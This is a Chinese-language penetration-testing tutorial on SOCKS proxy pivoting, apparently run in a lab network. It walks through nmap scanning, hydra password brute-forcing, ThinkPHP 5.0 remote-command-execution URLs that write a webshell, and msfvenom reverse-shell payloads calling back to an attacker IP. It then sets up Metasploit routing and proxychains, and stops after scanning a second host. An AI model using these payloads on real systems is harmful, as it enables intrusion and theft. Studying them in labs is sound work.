socks代理实战

socks代理实战文章目录 Socks 代理实战 Socks 代理简介 Socks 代理工具 Socks 代理实战 MSF 渗透场景 Target1Targe 代理实战 FRPTarget1Ta 代理实战 EWEW 使用简介 EW 正反向 Socks 代理 EW 创建一层 Socks 代理二级级联本地 SocksEW 创建二层 Socks 代理三级级联的本地 SocksEW 创建三层 Socks 代理 Socks 代理实战 Socks 代理简介什么是 socksSOCKS 是一种网络传输协议 主要用于客户端与外网服务器之

Socks代理实战

Socks代理简介

  • 什么是socks

SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。

根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。

使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务。

socks代理实战

osi参考模型:https://www.cnblogs.com/qishui/p/5428938.html

现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如 Internet 有效地隔离开来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET、FTP、SMTP等的接入。

而SOCKS则提供一个通用框架来使这些协议安全透明地穿过防火墙。

  • 什么是socks代理
  1. 被代理端与代理服务器通过SOCKS4/5代理协议进行通讯;
  2. SOCKS4是对HTTP代理协议的加强,它不仅代理HTTP协议,而是对所有向外的连接进行代理,没有协议限制;
  3. SOCKS5对前一版本做了进一步扩展,增加了支持UDP代理和身份验证功能;
  4. SOCKS5采用地址解析方案 (addressing scheme) 以支持域名和 IPV6 地址解析。

使用Socks代理:

  1. SOCKS服务器的IP地址
  2. SOCKS服务所在端口
  3. SOCKS服务是否需要身份验证

Socks代理工具

  • EarthWorm

http://rootkiter.com/EarthWorm/

  • FRP

https://github.com/fatedier/frp

frp 是一个可用于内网穿透的高性能的反向代理应用

  • ProxyChains

http://proxychains.sourceforge.net/

关于ProxyChains工具:

  1. 它是一个代理工具。
  2. 最新版本:3.1
  3. 专用OS:Linux和其他Unices。
  4. 允许TCP和DNS通过代理隧道。
  5. 支持HTTP、SOCKS4和SOCKS5代理服务器。
  6. 不同的代理类型可以混合在同一链中。
  7. 代理链:用户定义的代理链列表。

可用性:

  1. 通过代理服务器运行任何程序。
  2. 从限制性防火墙后面访问互联网。
  3. 隐藏你的IP
  4. 通过代理服务器运行SSH、telnet、wget、ftp、apt、vnc、nmap。
    5, 从外部通过反向代理访问内联网(192.168../10..)。

  • Other
reDuh:https://github.com/sensepost/reDuh reGeorg:https://github.com/sensepost/reGeorg sSocks:https://sourceforge.net/projects/ssocks/ SocksCap64:http://www.sockscap64.com Proxifier:https://www.proxifier.com/ 

Socks代理实战-MSF

渗透场景

socks代理实战

Target1

  • 信息收集
nmap -A -T4 -p- --script vuln 192.168.78.66 开放端口:21/22/80/111/888/3306/8888 操作系统:Linux 

socks代理实战

  • 分析利用
21 / 22端口:弱口令爆破 hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh 3306端口:不允许远程IP连接 8888端口:宝塔登录页面 80端口:Thinkphp v5.0 存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell。 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]= 
   
  • 主机信息收集
ifconfig:发现存在192.168.22.0/24的内网网段。 探测此网段存活主机,发现存活主机 192.168.22.22 

socks代理实战

socks代理实战

socks代理实战

#!/bin/bash for num in { 
   1..254}; do ip=192.168.22.$num ping -c1 $ip >/dev/null 2>&1 if [ $? = 0 ]; then echo "$ip" Ok else echo "$ip" No fi done 
@echo off chcp 65001>nul echo 正在扫描。。。。。。 for /L %%P in (1,1,254) do @ping -w 10 -n 1 192.168.78.%%P | findstr TTL= >>ip.txt echo 扫描结束,按任意键结束窗口! pause>nul 
  • 建立Socks代理
  1. 反弹target1的shell到msf
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.117 lport=6666 R > mingy.php msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.78.117 lport=6667 -f elf > mingy.elf 
  1. 上传到target1的tmp目录下
chmod 777 mingy.elf ./mingy.elf 
  1. 获得target1的meterpreter shell后,添加到192.168.22网段的路由
run autoroute -s 192.168.22.0/24 run autoroute -p 
  1. 使用msf的socks5模块建立socks服务,并配置proxychains代理
msf5 > use auxiliary/server/socks5 msf5 auxiliary(server/socks5) > run 
vim /etc/proxychains.conf socks5 127.0.0.1 1080 

Target2

  • 信息收集
proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22 开放端口:21/22/80/3306/8888 操作系统:linux 

socks代理实战

  • 分析利用
21 / 22 / 3306端口:弱口令爆破 proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql 8888端口:宝塔登录页面 80端口:bagecms(sql注入,任意文件编辑漏洞) proxychains curl 192.168.22.22 
  

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/207805.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月19日 下午1:03
下一篇 2026年3月19日 下午1:04


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号